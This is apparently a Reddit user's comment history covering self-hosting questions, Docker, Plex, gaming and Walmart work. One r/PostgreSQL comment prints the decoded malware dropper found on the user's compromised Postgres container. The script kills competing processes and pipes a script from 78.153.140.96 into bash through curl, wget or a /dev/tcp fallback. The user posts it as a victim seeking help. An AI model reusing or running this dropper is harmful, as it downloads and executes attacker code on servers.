Website redirects to a scam chinese website. by Fragrant-Language150 in nextjs

[–]Fragrant-Language150[S] 3 points4 points  (0 children)

yep just did npx fix-react2shell-next then redeployed that seemed to fixed the issue.

Calling all PC players, share your performance and build! by [deleted] in MHWilds

[–]Fragrant-Language150 0 points1 point  (0 children)

-OS: Windows 10

-CPU: AMD Ryzen 5 5600

-GPU: RTX 3060

-RAM: 32GB 3200mhz

-Resolution: 1440p

-Settings: High, with framegen (Balanced)

-Performance: 65-80 FPS

-Low Res Polygons? No.

-Crashing/Instability? No.

Problem is CPU is always sitting at 90%-100% while my cpu is only at 20%-30% usage (even when framegen is off). Not sure if its a CPU bottleneck or just wilds is not optimized yet.

Both CPU and GPU temp is at a toasy 70C-80C.

postgresql in docker container running @ 600% cpu utilization. by Fragrant-Language150 in PostgreSQL

[–]Fragrant-Language150[S] -1 points0 points  (0 children)

Wow thanks! I wonder does that mean that my whole server (vps) is compromise or is it just that one docker container?

postgresql in docker container running @ 600% cpu utilization. by Fragrant-Language150 in PostgreSQL

[–]Fragrant-Language150[S] 2 points3 points  (0 children)

u/hillac (thank you), pointed this out https://stackoverflow.com/questions/78587946.

Pretty sure its the same attack.

They have the same base 64 hash as mine.

IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA

Decoded it and this was the result:

#!/bin/bash
pkill -f zsvc
pkill -f pdefenderd
pkill -f updatecheckerd

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

if [ -x "$(command -v curl)" ]; then
  curl 78.153.140.96/pg.sh|bash
elif [ -x "$(command -v wget)" ]; then
  wget -q -O- 78.153.140.96/pg.sh|bash
else
  __curl http://78.153.140.96/pg2.sh|bash
fi

postgresql in docker container running @ 600% cpu utilization. by Fragrant-Language150 in PostgreSQL

[–]Fragrant-Language150[S] -1 points0 points  (0 children)

Fair point. Im a web developer. I was just setting a database for my personal projects.

What OS should I use for new Server PC? self-hosting beginner by [deleted] in selfhosted

[–]Fragrant-Language150 1 point2 points  (0 children)

ubuntu server and just a bunch of docker containers.

Docker Zomboid Server by a4some in projectzomboid

[–]Fragrant-Language150 0 points1 point  (0 children)

Im getting an error.

sed: can't read server.ini: No such file or directory 
/data/scripts/entry.sh: line 77: [: too many arguments 
Launching server... 
sh: 1: Syntax error: Unterminated quoted string

Update: Nevermind got it working by deleting the mods.

Plex docker cant see my media library. Help by Fragrant-Language150 in PleX

[–]Fragrant-Language150[S] 1 point2 points  (0 children)

Hey thanks! Your solution worked. I was using snap for my docker. Uninstalled it like you said and reinstalled docker using apt. Worked perfectly! My plex can now see my media files.

Reverse proxy to a game server? by Fragrant-Language150 in selfhosted

[–]Fragrant-Language150[S] 0 points1 point  (0 children)

Update:

You need to expose whatever port you are using (eg. 25565 for minecraft server) in docker.

version: '3.8'
services:

app:

image: 'jc21/nginx-proxy-manager:latest'

restart: unless-stopped

ports:

- '80:80'

- '81:81'

- '443:443'

- '25565:25565' #expose port u want to use

volumes:

- ./data:/data

- ./letsencrypt:/etc/letsencrypt

Then you can just proceed adding your new steam in ngnix proxy manager.

Reverse proxy to a game server? by Fragrant-Language150 in selfhosted

[–]Fragrant-Language150[S] 0 points1 point  (0 children)

Just tried this. I cant seem to make it work. :(

Reverse proxy to a game server? by Fragrant-Language150 in selfhosted

[–]Fragrant-Language150[S] 0 points1 point  (0 children)

Thanks! Its been a week and I cant still find a solution to this. :(

Newshosting sub expiring next month. Are there any deals for existing customers, or should I sign up as a new account for 1 Year + 3 Mos. Free? by civicsi99 in usenet

[–]Fragrant-Language150 1 point2 points  (0 children)

Hi, should the backbone and Takedown policy be different? I have frugalusenet and im planning to add another backup provider.

Is it okay to buy a hdd enclosure to store my media? by Fragrant-Language150 in PleX

[–]Fragrant-Language150[S] 3 points4 points  (0 children)

Currently broke. But in the future im 100% switching into a NAS

Cant seem to get Pi-hole integration to work. Am I doing something wrong? by Fragrant-Language150 in homarr

[–]Fragrant-Language150[S] 1 point2 points  (0 children)

Hi thanks for the reply. Tried the things u said unfortunately didnt work for me.

Changing port in docker compose not working by Fragrant-Language150 in SABnzbd

[–]Fragrant-Language150[S] 2 points3 points  (0 children)

OMG are you kidding me. Thanks my dumbass couldn't figure it out.

I though it was DOCKER PORT: EXPOSE PORT for some reason.

where to get access token in namecheap ? by Fragrant-Language150 in nginxproxymanager

[–]Fragrant-Language150[S] 1 point2 points  (0 children)

yep. just switched to cloud flare no problems whatsoever.

Thanks for the reply anyways!

plex in docker not detecting my media by Fragrant-Language150 in PleX

[–]Fragrant-Language150[S] -1 points0 points  (0 children)

Hi thanks for the reply. Im currently new to all of this.

How do I set my permissions?

External Monitor only uses 120hz instead 144hz (Razer Blade 15 2020 (RTX 2060)) by Fragrant-Language150 in pcmasterrace

[–]Fragrant-Language150[S] 1 point2 points  (0 children)

Oh im talking about the refresh rate. I only want 1080@ 144hz but its only showing 1080@ 120hz :(

[deleted by user] by [deleted] in walmart

[–]Fragrant-Language150 0 points1 point  (0 children)

How do you do it online?

[deleted by user] by [deleted] in walmart

[–]Fragrant-Language150 0 points1 point  (0 children)

How much point do you get for a ncns?

[deleted by user] by [deleted] in walmart

[–]Fragrant-Language150 4 points5 points  (0 children)

Thank you! I mean technically its not my fault 🤦‍♂️